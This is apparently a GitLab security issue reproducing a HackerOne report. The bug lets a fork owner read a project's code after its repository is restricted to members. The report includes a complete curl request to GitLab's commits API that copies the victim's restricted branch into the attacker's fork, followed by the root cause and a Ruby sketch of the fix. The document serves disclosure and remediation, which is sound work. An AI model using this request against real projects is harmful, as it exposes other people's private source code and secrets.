Leaking source code of restricted project through a fork

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2027967 by shells3c on 2023-06-15, assigned to @ottilia_westerlund:

Report

Summary

The codebase of any project that has Repository visibility set to Only Project Members can be leaked if it has a fork out there

Steps to reproduce
  1. Victim account creates a public project
  2. Attacker account forks this project
  3. Victim account sets the Repository visibility of the project to Only Project Members, and then creates a file, let's say secret.txt with some secret inside it
  4. As the attacker, execute this command
curl --request POST \
     --form "start_project=<victim_project_id>" \
     --form "branch=steal" \
     --form "commit_message=some commit message" \
     --form "start_branch=<victim_project_branch>" \
     --form "actions[][action]=create" \
     --form "actions[][file_path]=foo" \
     --form "actions[][content]=bar" \
     --header "PRIVATE-TOKEN: <attacker_access_token>" \
     "https://gitlab.com/api/v4/projects/<attacker_project_id>/repository/commits"

with:

  • <attacker_access_token> is the access token of the attacker account
  • <attacker_project_id> is the project ID or URL-encoded path of the attacker project, which is the fork
  • <victim_project_id> is the project ID or URL-encoded path of the victim project
  • <victim_project_branch> is the branch that you want to steal the code from. In this test, you can use main
  5. Attacker account visits the fork, switches to branch steal to read secret.txt
Output of checks

This bug happens on GitLab.com

Impact

Disclosure of restricted project's source code by using a fork

Investigation (by @vyaklushin)

Here we verify that the user has access to the project, but we don't check if the user has access to the code.

We do a read_project check, which is successful, but we don't do a read_code check, which is necessary to ensure the code is accessible.

A validation like this one should help.

can?(current_user, :read_code, start_project)

We should also check user permissions in Files::MultiService to prevent this bug from appearing again.
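An added illustration of the two checks the investigation distinguishes (this is not GitLab's code; the Project struct, Policy class and the two helper functions are assumptions). It shows why a read_project check passes for a non-member on a public project whose repository is restricted to members, while a read_code check on the same start_project does not:

```ruby
# Added illustration (not GitLab code): a minimal model of the read_project and
# read_code checks. GitLab's real policy classes and Files::MultiService are far
# richer; every name below is an assumption made for this example.

# A project has an overall visibility and a separate repository access level.
Project = Struct.new(:id, :visibility, :repository_access, :members, keyword_init: true)

class Policy
  # read_project: the project itself is visible (public, or the user is a member).
  def self.read_project?(user, project)
    project.visibility == :public || project.members.include?(user)
  end

  # read_code: the repository contents are readable. With repository_access set
  # to :members_only, only project members qualify, even on a public project.
  def self.read_code?(user, project)
    return false unless read_project?(user, project)
    project.repository_access == :enabled || project.members.include?(user)
  end
end

# Vulnerable shape: only read_project is checked on the start_project, so a
# non-member who owns a fork can start a branch from a members-only repository.
def start_project_allowed_vulnerable?(user, start_project)
  Policy.read_project?(user, start_project)
end

# Fixed shape: mirrors the suggested can?(current_user, :read_code, start_project).
def start_project_allowed_fixed?(user, start_project)
  Policy.read_project?(user, start_project) && Policy.read_code?(user, start_project)
end

# Constructed sample: the victim's project is public, but its repository
# visibility has been set to "Only Project Members".
VICTIM_PROJECT = Project.new(id: 1, visibility: :public,
                             repository_access: :members_only, members: ["victim"])

if __FILE__ == $PROGRAM_NAME
  puts "attacker, vulnerable check: #{start_project_allowed_vulnerable?('attacker', VICTIM_PROJECT)}" # true
  puts "attacker, fixed check:      #{start_project_allowed_fixed?('attacker', VICTIM_PROJECT)}"      # false
  puts "member, fixed check:        #{start_project_allowed_fixed?('victim', VICTIM_PROJECT)}"        # true
end
```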

How To Reproduce

Please add reproducibility information to this section:

Edited by Vasilii Iakliushin